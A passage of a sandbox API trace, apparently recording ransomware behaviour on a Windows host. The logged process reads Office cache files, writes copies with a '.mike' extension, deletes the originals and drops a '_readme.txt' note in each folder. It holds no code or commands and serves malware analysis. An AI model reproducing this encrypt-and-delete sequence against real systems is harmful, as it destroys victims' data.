ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.257] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0040.257] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.mike", lpFilePart=0x0) returned 0x56 [0040.257] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0040.257] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.257] GetFileType (hFile=0x264) returned 0x1 [0040.257] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0040.257] GetFileType (hFile=0x264) returned 0x1 [0040.257] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0040.258] WriteFile (in: hFile=0x264, lpBuffer=0x2288f40*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x2288f40*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0040.258] CloseHandle (hObject=0x264) returned 1 [0040.259] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0040.259] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml"), fInfoLevelId=0x0, lpFileInformation=0x2288a10 | out: lpFileInformation=0x2288a10*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa38b7300, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0xa38b7300, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xf01be3d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x543)) returned 1 [0040.259] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0040.259] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml", lpFilePart=0x0) returned 0x51 [0040.259] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0040.259] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.259] GetFileType (hFile=0x264) returned 0x1 [0040.259] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0040.259] GetFileType (hFile=0x264) returned 0x1 [0040.259] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0040.259] ReadFile (in: hFile=0x264, lpBuffer=0x228a078, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x228a078*, lpNumberOfBytesRead=0x2af0c8*=0x543, lpOverlapped=0x0) returned 1 [0040.262] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.mike", lpFilePart=0x0) returned 0x56 [0040.262] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0040.262] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.262] GetFileType (hFile=0x264) returned 0x1 [0040.262] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0040.262] GetFileType (hFile=0x264) returned 0x1 [0040.262] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0040.262] WriteFile (in: hFile=0x264, lpBuffer=0x228eefc*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x228eefc*, lpNumberOfBytesWritten=0x2af0bc*=0x550, lpOverlapped=0x0) returned 1 [0040.262] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb50, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.mike", lpFilePart=0x0) returned 0x56 [0040.263] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0040.263] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.263] GetFileType (hFile=0x264) returned 0x1 [0040.263] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0040.263] GetFileType (hFile=0x264) returned 0x1 [0040.264] WriteFile (in: hFile=0x264, lpBuffer=0x2292138*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x2292138*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0040.264] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml", lpFilePart=0x0) returned 0x51 [0040.264] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.mike", lpFilePart=0x0) returned 0x56 [0040.264] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0040.264] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe232fb80, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe232fb80, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe232fb80, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x770)) returned 1 [0040.264] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0040.264] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml", lpFilePart=0x0) returned 0x51 [0040.264] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.mike", lpFilePart=0x0) returned 0x56 [0040.264] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.264] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2293950 | out: lpFileInformation=0x2293950*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe232fb80, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe232fb80, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe232fb80, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x770)) returned 1 [0040.264] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.264] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml", lpFilePart=0x0) returned 0x51 [0040.265] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml", dwFileAttributes=0x80) returned 1 [0040.265] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2aece0, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml", lpFilePart=0x0) returned 0x51 [0040.265] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml")) returned 1 [0040.266] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml", lpFilePart=0x0) returned 0x51 [0040.266] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0040.266] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.266] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0040.266] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml", lpFilePart=0x0) returned 0x51 [0040.266] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\_readme.txt", lpFilePart=0x0) returned 0x53 [0040.266] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af068) returned 1 [0040.266] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\_readme.txt" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0040.266] GetFileType (hFile=0x264) returned 0x1 [0040.266] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af064) returned 1 [0040.266] GetFileType (hFile=0x264) returned 0x1 [0040.267] WriteFile (in: hFile=0x264, lpBuffer=0x22956c8*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af100, lpOverlapped=0x0 | out: lpBuffer=0x22956c8*, lpNumberOfBytesWritten=0x2af100*=0x45e, lpOverlapped=0x0) returned 1 [0040.268] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1ec) returned 1 [0040.268] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en", lpFilePart=0x0) returned 0x47 [0040.268] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\", nBufferLength=0x105, lpBuffer=0x2aecc8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\", lpFilePart=0x0) returned 0x48 [0040.268] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\*", lpFindFileData=0x2aef14 | out: lpFindFileData=0x2aef14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf01c0310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe2355ce0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe2355ce0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0040.268] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf01c0310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe2355ce0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe2355ce0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.268] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x219b4a00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x219b4a00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xf07b1ad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xaf35ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.cab", cAlternateFileName="")) returned 1 [0040.268] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4db6cb00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x4db6cb00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xf020c5d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd5c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.msi", cAlternateFileName="")) returned 1 [0040.268] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe232fb80, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe232fb80, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe232fb80, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x770, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.xml.mike", cAlternateFileName="PROOFX~1.MIK")) returned 1 [0040.268] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe2355ce0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe2355ce0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe2355ce0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0040.269] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe2355ce0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe2355ce0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe2355ce0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0040.269] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0040.269] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0040.269] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1b8) returned 1 [0040.269] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\.", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es", lpFilePart=0x0) returned 0x47 [0040.269] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0040.269] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0040.269] CoTaskMemFree (pv=0x4fe370) [0040.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0040.269] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es", nBufferLength=0x105, lpBuffer=0x2aed24, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es", lpFilePart=0x0) returned 0x47 [0040.269] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1ec) returned 1 [0040.269] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es", lpFilePart=0x0) returned 0x47 [0040.269] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\", nBufferLength=0x105, lpBuffer=0x2aecc8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\", lpFilePart=0x0) returned 0x48 [0040.270] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\*", lpFindFileData=0x2aef14 | out: lpFindFileData=0x2aef14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4d53d90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf4f690d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0040.270] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4d53d90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf4f690d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.270] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3ba05100, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3ba05100, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd02aea, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.cab", cAlternateFileName="")) returned 1 [0040.270] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf4e5c7f0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd7200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.msi", cAlternateFileName="")) returned 1 [0040.270] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf4e37e00, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5b1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.xml", cAlternateFileName="")) returned 1 [0040.270] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0040.270] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0040.270] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0040.270] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1b8) returned 1 [0040.271] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab", lpFilePart=0x0) returned 0x51 [0040.271] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi", lpFilePart=0x0) returned 0x51 [0040.271] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml", lpFilePart=0x0) returned 0x51 [0040.271] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml", lpFilePart=0x0) returned 0x51 [0040.271] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml", lpFilePart=0x0) returned 0x51 [0040.271] 